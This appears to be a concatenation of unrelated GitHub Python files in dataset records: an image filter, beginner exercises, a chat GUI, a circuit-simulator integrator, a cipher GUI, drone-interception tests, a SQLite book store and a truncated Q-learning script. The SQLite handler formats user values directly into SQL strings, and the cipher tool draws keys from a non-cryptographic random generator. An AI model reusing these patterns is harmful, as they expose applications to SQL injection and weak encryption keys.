e poi sommo tutti gli elementi della matrice\r\n retImage[y, x] = (filter * imageWithPadding[y: y+filterSize, x: x+filterSize]).sum()\r\n return retImage\r\n\r\n\r\n#Funzione che effetua la divisione dei valori dei pixel tra 2 immagini \r\n\r\ndef Image_Division(Image1,Image2,scale):\r\n Final_Image = np.zeros((Image1.shape[0],Image1.shape[1]))\r\n for x in range(0,Image1.shape[0]):\r\n for y in range(0,Image1.shape[1]):\r\n if Image2[x,y] == 0:\r\n Final_Image[x,y] = Image1[x,y] * 255 / (Image2[x,y] + 1)\r\n else:\r\n Final_Image[x,y] = Image1[x,y] * 255 / Image2[x,y]\r\n return Final_Image\r\n\r\n\r\n \r\n# 12 = FILTER.SHAPE[0] - 1 \r\n\r\n# 6 = FILTER.SHAPE[0] / 2\r\n\r\n# 13 = FILTER.SHAPE[0]\r\n\r\n\r\n \r\n \r\n \r\n ","repo_name":"IvanNic06/Photo-Sketching","sub_path":"Function/SingleCore/Process_Image.py","file_name":"Process_Image.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16263929992","text":"num = []\naux = 0\nwhile len(num) != 3 or num[0] == num[1] or num[1] == num[2]: # 3 different values\n for i in range(3):\n num.append(int(input(\"enter value:\")))\n\nwhile num[1] > num[0] or num[2] > num[1]: # until values are arranged correctly\n if num[2] > num[1]: # arrangement of 2 and 1\n aux = num[2]\n num[2] = num[1]\n num[1] = aux\n if num[1] > num[0]: # 1 and 0\n aux = num[0]\n num[0] = num[1]\n num[1] = aux\n\nprint(num[0], \"is the greater number and\", num[2], \"the 
lower\")\n","repo_name":"rubengr16/Pythonic","sub_path":"array3greaterLower.py","file_name":"array3greaterLower.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7367814919","text":"#### implement gui, use scroll and others from tkinter\n#### combine chat and chatbox into one file.\n\nimport chat_server\nimport tkinter as tk\nimport time\n\nclass gui:\n\n def __init__(self, da_connection):\n self.connection = da_connection\n \n self.mainbox = tk.Tk()\n self.mainbox.geometry(\"500x500\")\n self.mainbox.title(\"Abrupt Cow Chat\")\n\n # text viewing window\n self.viewer = tk.Text(self.mainbox, height=2, width=30)\n self.viewer.place( x=10 , y=10 , width=430 , height=400 )\n\n # scrollbar object\n self.scroller = tk.Scrollbar( self.mainbox )\n self.scroller.place( x=455 , y=10 , width=25 , height=400 )\n\n\n # entry box to input messages.\n self.message_box = tk.Entry()\n self.message_box.place( x=10 , y=430 , width=360 , height=30 )\n \n # button for sending messages\n self.sender = tk.Button( self.mainbox , text=\"Send Message\" )\n self.sender.place( x=380 , y=430 , width=100 )\n \n \n # syncs the scrollbar with the text window.\n self.scroller.config( command=self.viewer.yview )\n self.viewer.config( yscrollcommand=self.scroller.set )\n\n \n\n # binds keyboard shortcuts to send messsage.\n self.mainbox.bind('' , self.get_message_to_send)\n self.sender.bind('' , self.get_message_to_send)\n self.queue = ''\n \n self.message = ''\n \n while True:\n self.mainbox.update()\n self.u()\n \n\n\n def get_message_to_send(self,event):\n\n s = self.message_box.get()\n if s != '':\n self.message_box.delete(0, tk.END)\n \n self.connection.send(s)\n \n return\n\n\n\n def u(self):\n k = self.connection.receive()\n if k != 'E O F: EOF':\n \n k = k.encode(encoding='utf-8')\n self.viewer.delete('1.0', tk.END)\n \n self.viewer.insert(tk.END , k)\n self.viewer.insert(tk.END , '\\n')\n self.viewer.yview_moveto( 1 )\n\n\n","repo_name":"Bloxore/Hack-UCI-2019","sub_path":"chat_gui.py","file_name":"chat_gui.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"408798369","text":"\"\"\" 207 IF\r\nif ... elif\r\nPF - 20.07.2021 v5\r\n\"\"\" #\r\n\r\n# pylint: disable=invalid-name\r\n# pylint: disable=pointless-string-statement\r\n\r\n\r\nfrom random import randint\r\n\r\nnota = randint(1, 11)\r\n\r\nif nota == 10:\r\n print('foarte bine')\r\nelif nota == 5:\r\n print('am trecut si de data asta!')\r\n\r\ninput('Apasa pt a iesi')\r\n","repo_name":"oprea1991/PythonInfoAcademyCourse","sub_path":"Cap2_07_if_elif.py","file_name":"Cap2_07_if_elif.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10295293356","text":"from __future__ import (unicode_literals, absolute_import,\n division, print_function)\n\nimport numpy as np\nimport sys\n\nfrom scipy.misc import factorial\n\nfrom . 
import printing\n\norder = None\n# FAST = True\n\n\ndef is_implicit():\n return True\n\n\ndef has_ff():\n return True\n\n\ndef get_required_values():\n \"\"\"This returns two python arrays built this way:\n [ max_order_of_x, max_order_of_dx ]\n Where:\n Both the values are int, or None\n if max_order_of_x is set to k, the df method needs all the x(n-i) values of x,\n where i<=k (the value the function assumed i+1 steps before the one we will ask for the derivative).\n The same applies to max_order_of_dx, but regards dx(n)/dt\n None means that NO value is required.\n\n The first array has to be used if no prediction is required, the second are the values needed for prediction.\n \"\"\"\n # notice that: it returns the same values, it should be order-1 if no prediction is required BUT\n # we build the required values in a (hopefully) fast way, that requires\n # one point more.\n return ((order, None), (order, None))\n\n\ndef get_df(pv_array, suggested_step, predict=False):\n \"\"\"The array must be built in this way:\n It has to be an array of arrays. Each of them has the following structure:\n\n [time, np_matrix, np_matrix]\n\n Hence the pv_array[k] element is made of:\n _ time is the time in which the solution is valid: t(n-k)\n _ The first np_matrix is x(n-k)\n _ The second is d(x(n-k))/dt\n Values that are not needed may be set to None and they will be disregarded.\n\n if predict == True, it needs one more point to give a prediction\n of x at the suggested step.\n\n Returns: None if the incorrect values were given, or quits.\n Otherwise returns an array:\n _ the [0] element is the np matrix of coeffiecients (Nx1) of x(n+1)\n _ the [1] element is the np matrix of constant terms (Nx1) of x(n+1)\n The derivative may be written as:\n d(x(n+1))/dt = ret[0]*x(n+1) + ret[1]\"\"\"\n\n if order is None:\n printing.print_general_error(\n \"You must set Gear's order before using it! e.g. 
gear.order = 5\")\n sys.exit(1)\n\n s = []\n s.append(0)\n for index in range(1, order + 2):\n s.append(suggested_step + pv_array[0][0] - pv_array[index - 1][0])\n\n # build e[k, i]\n e = np.zeros((order + 2, order + 2))\n for k_index in range(1, order + 2):\n for i_index in range(1, order + 2):\n if i_index == k_index:\n e[k_index, i_index] = 1\n else:\n e[k_index, i_index] = s[i_index] / (s[i_index] - s[k_index])\n\n alpha = np.zeros((1, order + 2))\n for k_index in range(1, order + 2):\n alpha[0, k_index] = 1.0\n for j_index in range(order + 1):\n alpha[0, k_index] = alpha[0, k_index] * e[k_index, j_index + 1]\n\n # build gamma\n gamma = np.zeros((1, order + 1))\n for k_index in range(1, order + 1):\n gamma[0, k_index] = alpha[0, k_index] * \\\n ((1.0 / s[order + 1]) - (1.0 / s[k_index]))\n\n gamma[0, 0] = 0\n for index in range(1, order + 1):\n gamma[0, 0] = gamma[0, 0] - gamma[0, index]\n\n # values to be returned\n C1 = gamma[0, 0]\n\n C0 = np.zeros(pv_array[0][1].shape)\n for index in range(order):\n C0 = C0 + gamma[0, index + 1] * pv_array[index][1]\n\n x_lte_coeff = 0\n for k_index in range(1, order + 1):\n x_lte_coeff = x_lte_coeff + \\\n (s[k_index] ** (order + 1)) * \\\n (-1.0 * gamma[0, k_index] / gamma[0, 0])\n x_lte_coeff = ((-1.0) ** (order + 1)) * \\\n (1.0/factorial(order + 1)) * x_lte_coeff\n\n if predict:\n predict_x = np.zeros(pv_array[0][1].shape)\n for index in range(1, order + 2): # order\n predict_x = predict_x + alpha[0, index] * pv_array[index - 1][1]\n\n predict_lte_coeff = -1.0/factorial(order + 1)\n for index in range(1, order + 2):\n predict_lte_coeff = predict_lte_coeff * s[index]\n # print predict_lte_coeff\n # print x_lte_coeff\n else:\n predict_x = None\n predict_lte_coeff = None\n\n return C1, C0, x_lte_coeff, predict_x, predict_lte_coeff\n","repo_name":"ahkab/ahkab","sub_path":"ahkab/gear.py","file_name":"gear.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":336,"dataset":"github-code","pt":"67"} +{"seq_id":"74070025493","text":"from Controller import ShiftController\nfrom Controller import SubstitutionController\nfrom Controller import AffineController\nfrom Controller import VigenereController\nfrom Controller import HillController\nfrom Controller import PermutationController\nfrom Controller import DESController\nfrom Controller import AESController\nfrom Model import DAO\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\nfrom tkinter import filedialog\nimport math\nimport random\nimport numpy as np\n\n\nclass View:\n def __init__(self):\n self.main = Tk()\n self.main.title(\"Multi-encryptor\")\n self.icon = PhotoImage(file=\"Image/shield.png\")\n self.main.iconphoto(False, self.icon)\n self.main.attributes(\"-topmost\", True)\n self.main.resizable(False, False)\n\n self.TextLabel = Label(self.main, text=\"Bản rõ:\", font=(\"Arial\", \"12\"))\n self.TextField = Text(self.main, borderwidth=2, relief=\"ridge\", width=60, height=10)\n self.TextScrollbar = Scrollbar(self.main, command=self.TextField.yview, orient=VERTICAL)\n self.TextField['yscrollcommand'] = self.TextScrollbar.set\n\n self.CryptLabel = Label(self.main, text=\"Bản mã:\", font=(\"Arial\", \"12\"))\n self.CryptField = Text(self.main, borderwidth=2, relief=\"ridge\", width=60, height=10, state=\"disabled\")\n self.CryptScrollbar = Scrollbar(self.main, command=self.CryptField.yview, orient=VERTICAL)\n self.CryptField['yscrollcommand'] = self.CryptScrollbar.set\n\n self.CipherOptionLabel = 
Label(self.main, text=\"Hệ mã hóa\", font=(\"Arial\", \"14\", \"bold\"))\n self.option = [\"Shift Cipher\", \"Substitution Cipher\", \"Affine Cipher\",\n \"Vigenère Cipher\", \"Hill Cipher\", \"Permutation Cipher\",\n \"DES\", \"AES 128\", \"AES 192\", \"AES 256\"]\n self.CipherOption = ttk.Combobox(self.main, values=self.option, state='readonly')\n self.CipherOption.current(0)\n\n self.KLabel = Label(self.main, text=\"Khóa k:\", font=(\"Arial\", \"12\"))\n self.KField = Entry(self.main, font=(\"Arial\", \"12\"))\n\n self.var = IntVar()\n self.var.set(0)\n self.DefaultRadioButton = Radiobutton(self.main, text=\"Mặc định\", variable=self.var, value=0)\n self.FileRadioButton = Radiobutton(self.main, text=\"Chọn file\", variable=self.var, value=1)\n\n self.EncryptButton = ttk.Button(self.main, text=\"Encrypt\", command=self.EncryptButtonClick)\n self.DecryptButton = ttk.Button(self.main, text=\"Decrypt\", command=self.DecryptButtonClick)\n\n self.TextLabel.grid(column=0, row=0, sticky=W)\n self.TextField.grid(column=0, row=1, columnspan=2, rowspan=2)\n self.TextScrollbar.grid(column=2, row=1, rowspan=2, sticky=W + N + S)\n\n self.CryptLabel.grid(column=0, row=3, sticky=W)\n self.CryptField.grid(column=0, row=4, columnspan=2, rowspan=3)\n self.CryptScrollbar.grid(column=2, row=4, rowspan=3, sticky=W + N + S)\n\n self.CipherOptionLabel.grid(column=3, row=1, columnspan=2, padx=10)\n self.CipherOption.grid(column=3, row=2, columnspan=2)\n\n self.KLabel.grid(column=3, row=3, sticky=W, padx=10)\n self.KField.grid(column=3, row=4, columnspan=2, sticky=N, padx=10)\n\n self.DefaultRadioButton.grid(column=3, row=5, sticky=S)\n self.FileRadioButton.grid(column=4, row=5, sticky=S)\n\n self.EncryptButton.grid(column=3, row=6)\n self.DecryptButton.grid(column=4, row=6)\n\n self.main.mainloop()\n\n def EncryptButtonClick(self):\n s = self.TextField.get('1.0', 'end-1c')\n k = self.KField.get()\n if s == \"\":\n if self.var.get() == 0:\n self.ShowDefaultText()\n else:\n self.ShowFileText()\n self.CryptField.configure(state=\"normal\")\n self.CryptField.delete('1.0', 'end-1c')\n self.CryptField.configure(state=\"disabled\")\n else:\n DAO.SetText(s)\n if k == \"\":\n k = self.autokey()\n else:\n crypt = \"\"\n if self.CipherOption.get() == \"Shift Cipher\":\n try:\n k = int(k)\n crypt = ShiftController.Encrypt(k)\n except ValueError:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n\n elif self.CipherOption.get() == \"Substitution Cipher\":\n if len(k) == 95:\n crypt = SubstitutionController.Encrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"Affine Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) != 2:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n elif math.gcd(k[0], 128) != 1:\n messagebox.showinfo(\"Khóa k\", \"Khóa k không phù hợp!\")\n else:\n crypt = AffineController.Encrypt(k)\n\n elif self.CipherOption.get() == \"Vigenère Cipher\":\n crypt = VigenereController.Encrypt(k)\n\n elif self.CipherOption.get() == \"Hill Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) != math.isqrt(len(k)) ** 2:\n messagebox.showinfo(\"Khóa 
k\", \"Khóa k sai định dạng!\")\n elif math.gcd(int(round(np.linalg.det(k)) % 128), 128) != 1:\n messagebox.showinfo(\"Khóa k\", \"Khóa k không phù hợp!\")\n else:\n crypt = HillController.Encrypt(k)\n\n elif self.CipherOption.get() == \"Permutation Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) == len(DAO.GetText()):\n crypt = PermutationController.Encrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n\n elif self.CipherOption.get() == \"DES\":\n if len(k) == 16:\n crypt = DESController.Encrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 128\":\n if len(k) == 32:\n crypt = AESController.Encrypt(k, 128)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 192\":\n if len(k) == 48:\n crypt = AESController.Encrypt(k, 192)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 256\":\n if len(k) == 64:\n crypt = AESController.Encrypt(k, 256)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n self.CryptField.configure(state=\"normal\")\n crypt = DAO.bin_txt(crypt)\n DAO.SetCrypt(crypt)\n self.CryptField.delete('1.0', 'end-1c')\n self.CryptField.insert(END, crypt.strip())\n self.CryptField.configure(state=\"disabled\")\n\n def DecryptButtonClick(self):\n self.CryptField.configure(state=\"normal\")\n s = self.CryptField.get('1.0', 'end-1c')\n self.CryptField.configure(state=\"disabled\")\n k = self.KField.get()\n if s == \"\":\n self.CryptField.configure(state=\"normal\")\n if self.var.get() == 0:\n self.ShowDefaultCrypt()\n else:\n self.ShowFileCrypt()\n self.CryptField.configure(state=\"disabled\")\n self.TextField.delete('1.0', 'end-1c')\n else:\n if self.var.get() == 1:\n DAO.SetCrypt(s)\n if k == \"\":\n messagebox.showinfo(\"Khóa k\", \"Chưa điền Khóa k!\")\n else:\n text = \"\"\n if self.CipherOption.get() == \"Shift Cipher\":\n try:\n k = int(k)\n text = ShiftController.Decrypt(k)\n except ValueError:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n\n elif self.CipherOption.get() == \"Substitution Cipher\":\n if len(k) == 95:\n text = SubstitutionController.Decrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"Affine Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) != 2:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n elif math.gcd(k[0], 128) != 1:\n messagebox.showinfo(\"Khóa k\", \"Khóa k không phù hợp!\")\n else:\n text = AffineController.Decrypt(k)\n\n elif self.CipherOption.get() == \"Vigenère Cipher\":\n text = VigenereController.Decrypt(k)\n\n elif self.CipherOption.get() == \"Hill Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) != math.isqrt(len(k)) ** 2:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n elif math.gcd(int(round(np.linalg.det(k)) % 128), 128) != 1:\n 
messagebox.showinfo(\"Khóa k\", \"Khóa k không phù hợp!\")\n else:\n text = HillController.Decrypt(k)\n\n elif self.CipherOption.get() == \"Permutation Cipher\":\n k = tuple(int(num) for num in\n k.replace(\", \", \",\").replace(\"(\", \"\").replace(\")\", \"\")\n .replace(\"[\", \"\").replace(\"]\", \"\").replace(\"{\", \"\")\n .replace(\"}\", \"\").replace(\",\", \" \").split(\" \"))\n if len(k) == len(DAO.GetText()):\n text = PermutationController.Decrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k sai định dạng!\")\n\n elif self.CipherOption.get() == \"DES\":\n if len(k) == 16:\n text = DESController.Decrypt(k)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 128\":\n if len(k) == 32:\n text = AESController.Decrypt(k, 128)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 192\":\n if len(k) == 48:\n text = AESController.Decrypt(k, 192)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n elif self.CipherOption.get() == \"AES 256\":\n if len(k) == 64:\n text = AESController.Decrypt(k, 256)\n else:\n messagebox.showinfo(\"Khóa k\", \"Khóa k chưa đủ lớn!\")\n\n text = DAO.bin_txt(text)\n DAO.SetText(text)\n self.TextField.delete('1.0', 'end-1c')\n self.TextField.insert(END, text.strip())\n\n def ShowDefaultText(self):\n self.TextField.insert(END, DAO.GetText().strip())\n\n def ShowFileText(self):\n f = open(filedialog.askopenfilename(), \"r\")\n self.TextField.insert(END, f.read())\n f.close()\n\n def ShowDefaultCrypt(self):\n self.CryptField.configure(state=\"normal\")\n self.CryptField.insert(END, DAO.GetCrypt().strip())\n self.CryptField.configure(state=\"disabled\")\n\n def ShowFileCrypt(self):\n f = open(filedialog.askopenfilename(), \"r\")\n self.CryptField.configure(state=\"normal\")\n self.CryptField.insert(END, f.read())\n self.CryptField.configure(state=\"disabled\")\n f.close()\n\n def autokey(self):\n k = \"\"\n if self.CipherOption.get() == \"Shift Cipher\":\n k = random.randint(0, 127)\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"Substitution Cipher\":\n for i in range(32, 127):\n k += chr(i)\n k = list(k)\n random.shuffle(k)\n k = \"\".join(k)\n self.KField.insert(END, k)\n return k\n\n elif self.CipherOption.get() == \"Affine Cipher\":\n k = 2\n while math.gcd(k, 128) != 1:\n k = random.randint(1, 127)\n k = tuple((k, random.randint(0, 127)))\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"Vigenère Cipher\":\n k = \"\"\n for i in range(random.randint(5, 20)):\n k += chr(random.randint(32, 127))\n self.KField.insert(END, k)\n return k\n\n elif self.CipherOption.get() == \"Hill Cipher\":\n k = np.zeros((2, 2))\n while math.gcd(int(round(np.linalg.det(k)) % 128), 128) != 1:\n temp = []\n while len(temp) < 16:\n temp.append(random.randint(-128, 128))\n k = np.array(temp).reshape((math.isqrt(len(temp)), math.isqrt(len(temp))))\n self.KField.insert(END, str(k.flatten()))\n return k\n\n elif self.CipherOption.get() == \"Permutation Cipher\":\n k = [i for i in range(len(DAO.GetText()))]\n random.shuffle(k)\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"DES\":\n k = []\n for i in range(16):\n k.append(hex(random.randint(0, 15)).replace(\"0x\", \"\"))\n k = \"\".join(k)\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"AES 128\":\n k = []\n for i in range(32):\n k.append(hex(random.randint(0, 
15)).replace(\"0x\", \"\"))\n k = \"\".join(k)\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"AES 192\":\n k = []\n for i in range(48):\n k.append(hex(random.randint(0, 15)).replace(\"0x\", \"\"))\n k = \"\".join(k)\n self.KField.insert(END, str(k))\n return k\n\n elif self.CipherOption.get() == \"AES 256\":\n k = []\n for i in range(64):\n k.append(hex(random.randint(0, 15)).replace(\"0x\", \"\"))\n k = \"\".join(k)\n self.KField.insert(END, str(k))\n return k\n","repo_name":"levinhhung20032/Multi-encryptor","sub_path":"View/View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":16382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33594580552","text":"#! /usr/bin/env python3\n#-*- coding: utf-8 -*-\n'''\n Unit test for interception of a sequence of targets\n'''\nimport numpy as np, scipy.optimize, matplotlib.pyplot as plt\nfrom numpy.random import default_rng\nrng = default_rng()\nfrom itertools import permutations\nfrom copy import copy, deepcopy\nimport pdb\n\nimport proj_manen as pm, proj_manen_utils as pmu\n\ndef _decorate(ax, _l, _t, _yl, _xl=''): ax.legend(_l); ax.set_title(_t); ax.yaxis.set_label_text(_yl); ax.xaxis.set_label_text(_xl); ax.grid()\ndef plot(ax, _d, _targets, plot_targets=True):\n poses = np.asarray(_d.Xs)\n ax.plot(poses[:,0], poses[:,1], 'o', label=f'drone {_d.v:.1f} m/s')\n for _p, _psi, _t in zip(_d.Xs, _d.psis, _d.ts[1:]):\n vx, vy = pm._to_eucl(_d.v, _psi)\n ax.arrow(_p[0], _p[1], vx, vy, width=0.15, head_width=_d.v*0.05, head_length=_d.v*0.1, length_includes_head=True)\n _p1 = _d.get_pos(_t)\n ax.plot((_p[0], _p1[0]), (_p[1], _p1[1]), '--', color='C0')\n\n if plot_targets:\n for _targ in _targets:\n pc0 = _targ.get_pos(0)\n ax.plot(pc0[0], pc0[1], 'o', color='C1', label=f'{_targ.name} ${np.rad2deg(_targ.psi):.1f} deg {_targ.v:.1f} m/s$')\n ax.arrow(pc0[0], pc0[1], _targ.vx, _targ.vy, width=0.2, head_width=_targ.v*0.05, head_length=_targ.v*0.1, length_includes_head=True)\n\n for _ts, _targ in zip(_d.ts[1:], _targets):\n pi = _targ.get_pos(_ts)\n p0 = _targ.get_pos(0)\n ax.plot(pi[0], pi[1], 'o', color='C2', label=f'interception {_targ.name} {_ts:.2f} s')\n ax.plot((p0[0], pi[0]), (p0[1], pi[1]), '--', color='C1')\n \n ax.axis('equal');ax.legend();ax.grid()\n\ndef plot_all_sols(drone, targets, _nc=3):\n perms = set(permutations(targets))\n fig = plt.figure(tight_layout=True, figsize=[12.8, 9.6]); fig.canvas.set_window_title('Interceptions')\n _nc = min(_nc, len(perms))\n _nr, _r = np.divmod(len(perms), _nc)\n if _r>0: _nr+=1 \n axes = fig.subplots(_nr,_nc, sharex=True)#, sharey=True)\n print(f'{len(perms)} permutation')\n for targets, ax in zip(perms, axes.flatten()):\n pm.intercept_sequence(drone, targets)\n plot(ax, drone, targets)\n drone.clear_traj()\n\ndef test_1(filename, rnd=False): # first solution for a given scenario\n drone, targets = pmu.load_scenario(filename)\n if rnd:\n _p = rng.permutation(len(targets))\n targets = np.array(targets)[_p]\n pm.intercept_sequence(drone, targets)\n plot(plt.gca(), drone, targets)\n\ndef test_2(): # plot all solutions for a 2 targets scenario\n drone, targets = pmu.load_scenario('./scenario_2.yaml')\n plot_all_sols(drone, targets)\n plt.savefig('all_sols_scen2.png')\n\ndef test_3(): # plot all solutions for a 3 targets scenario\n drone, targets = pmu.load_scenario('./scenario_3.yaml')\n plot_all_sols(drone, targets)\n plt.savefig('all_sols_scen3.png')\n\ndef test_4(): # plot all solutions for a 4 targets 
scenario\n drone, targets = pmu.load_scenario('./scenario_4.yaml')\n plot_all_sols(drone, targets, _nc=4)\n plt.savefig('all_sols_scen4.png')\n\ndef test_5(filename): # compute all solutions, keeps worst and best\n #drone, targets = pmu.load_scenario(filename)\n drone, targets = pmu.make_random_scenario(ntarg=8, dp0=(0,0), dv=15)\n perms = set(permutations(targets))\n durations = []\n best_dur, best_targets, best_drone = float('inf'), None, None\n worst_dur, worst_targets, worst_drone = 0., None, None\n for targets in perms:\n _drone = deepcopy(drone)\n dur = pm.intercept_sequence(_drone, targets)\n durations.append(dur)\n if dur < best_dur:\n best_dur, best_targets, best_drone = dur, targets, _drone\n if dur > worst_dur:\n worst_dur, worst_targets, worst_drone = dur, targets, _drone\n #best_id = np.argmin(durations)\n #print(best_id, durations[best_id])\n \n plot(plt.gca(), best_drone, best_targets)\n plt.figure()\n plot(plt.gca(), worst_drone, worst_targets)\n \n #plt.hist(durations)\n plt.show()\n\nimport time\ndef test_6(): # plot exhaustive search time vs number of targets\n ntargs, dts= [2, 3, 4, 5, 6, 7, 8], []\n for ntarg in ntargs:\n drone, targets = pm.make_scenario(ntarg=ntarg, dp0=(0,0), dv=15)\n perms = set(permutations(targets))\n _start = time.perf_counter()\n for targets in perms:\n pm.intercept_sequence(deepcopy(drone), targets)\n _end = time.perf_counter();dts.append(_end-_start)\n print(f'{ntarg} targets -> {dts[-1]:.1f} s')\n plt.plot(ntargs, dts, '--o')\n _decorate(plt.gca(), _l=[''], _t='Search time vs number of targets', _yl='time in s', _xl='number of targets')\n plt.savefig('ex_search_time_vs_size.png')\n \n#test_1('./scenario_1.yaml')\n#test_1('./scenario_6.yaml')\n#plt.savefig('one_sols_scen6.png')\n#test_2()\n#test_3()\n#test_4()\ntest_5('./scenario_6.yaml')\n#test_6()\nplt.show()\n","repo_name":"poine/proj_emen","sub_path":"src/test_2.py","file_name":"test_2.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29714314664","text":"import sqlite3 as sql\nimport uuid\nfrom . 
import Book\n\nclass DBHandler(object):\n def __init__(self, conString: str):\n self.con = sql.connect(conString)\n\n def initalize(self):\n self.con.execute(\"\"\"\nCREATE TABLE IF NOT EXISTS \"Books\"\n(\n \"Key\" integer NOT NULL,\n \"Title\" character varying(256) NOT NULL,\n \"Author\" character varying(256) NOT NULL,\n \"Price\" double precision NOT NULL,\n PRIMARY KEY (\"Key\")\n)\"\"\")\n\n def add_book(self, book: Book.Book) -> None:\n self.con.execute(\"\"\"\nINSERT INTO \"Books\"(\n\t\"Title\", \"Author\", \"Price\")\n\tVALUES (\"{0}\", \"{1}\", \"{2}\");\n\"\"\".format(book.title, book.author, book.price))\n self.con.commit()\n\n def del_book(self, key: int) -> int:\n res = self.con.execute(\"\"\"\nDELETE FROM \"Books\" WHERE Key = \"{0}\";\n\"\"\".format(key))\n self.con.commit()\n return res.fetchone()\n\n def edit_book(self, book: Book.Book) -> int:\n res = self.con.execute(\"\"\"\nUPDATE \"Books\" SET \"Title\" = \"{0}\", \"Author\" = \"{1}\", \"Price\" = \"{2}\" WHERE Key = \"{3}\";\n\"\"\".format(book.title, book.author, book.price, book.key))\n self.con.commit()\n return res.fetchone()\n\n def get_books_by_author(self, author: str):\n res = self.con.execute(\"\"\"\nSELECT \"Key\", \"Title\", \"Author\", \"Price\" FROM \"Books\" WHERE \"Author\" = \"{0}\" ORDER BY \"Key\";\n\"\"\".format(author))\n data = res.fetchall()\n return self.__parse_books(data)\n\n def get_books_by_name(self, title: str):\n res = self.con.execute(\"\"\"\nSELECT \"Key\", \"Title\", \"Author\", \"Price\" FROM \"Books\" WHERE \"Title\" = \"{0}\" ORDER BY \"Key\";\n\"\"\".format(title))\n data = res.fetchall()\n return self.__parse_books(data)\n\n def get_all_books(self):\n res = self.con.execute(\"\"\"\nSELECT \"Key\", \"Title\", \"Author\", \"Price\" FROM \"Books\" ORDER BY \"Key\";\n\"\"\")\n data = res.fetchall()\n return self.__parse_books(data)\n\n def get_book(self, id: int) -> Book.Book:\n res = self.con.execute(\"\"\"\nSELECT \"Key\", \"Title\", \"Author\", \"Price\" FROM \"Books\" WHERE \"Key\" = \"{0}\";\n\"\"\".format(id))\n\n data = res.fetchall()\n books = self.__parse_books(data)\n if (len(books) > 0):\n return books[0]\n return None\n\n def __parse_books(self, data):\n books = []\n for key, title, author, price in data:\n book = Book.Book(title, author, price)\n book.key = key\n books.append(book)\n return books\n","repo_name":"Soyvolon/CSCI471","sub_path":"PlayingWithADB/core/DBHandler.py","file_name":"DBHandler.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13866518530","text":"import numpy as np\n\nn_state = 2\nn_action = 2\nc, r_A, r_B = 3, 2, 1\na = 0.9\nQ_table = np.zeros((n_state, 